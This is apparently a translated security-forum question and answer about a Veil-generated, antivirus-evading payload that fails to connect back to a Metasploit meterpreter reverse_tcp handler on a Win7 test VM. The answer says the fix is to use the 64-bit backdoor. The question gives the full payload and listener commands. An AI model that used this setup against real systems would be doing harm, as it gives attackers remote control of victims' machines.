¿A dónde me voy mal con Veil? ¿No se puede obtener una cáscara inversa?

3

Así es como estoy generando la carga útil en Veil 3

> use XX
> set LHOST X.X.X.X
> set LPORT 3333
> generate

La carga útil se genera con éxito y se transfiere a la máquina víctima Win7 SP1 VM sin ejecutar ningún tipo de antivirus. Mientras que en el final de metasploit

> msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST X.X.X.X
> set LPORT 3333
> set ExitOnSession false 
> exploit

X.X.X.X es una IP pública. Mientras ejecuto esto, me quedo atascado en seguir y no pasa nada

[*] Started reverse TCP handler on X.X.X.X:3333

¿A dónde me voy mal? Cuál podría ser el problema aquí. He permitido el puerto 3333 en ufw y ningún otro servicio está escuchando ese puerto. También después de ejecutar la carga útil en la máquina víctima y hacer netstat no me da ninguna instancia del puerto 3333 comunicándome a X.X.X.X.

    
pregunta Youbecks003 04.03.2018 - 12:32
fuente

1 respuesta

0

He tenido este problema antes, y mi problema era que la carga útil del velo era una versión de 32 bits del backdoor generado. Tuve que usar la versión x64 de la puerta trasera. Si no tiene la versión de 64 bits de la carga útil, deberá actualizar su velo y volver a intentarlo.

    
respondido por el standarduser 26.11.2018 - 16:27
fuente

Lea otras preguntas en las etiquetas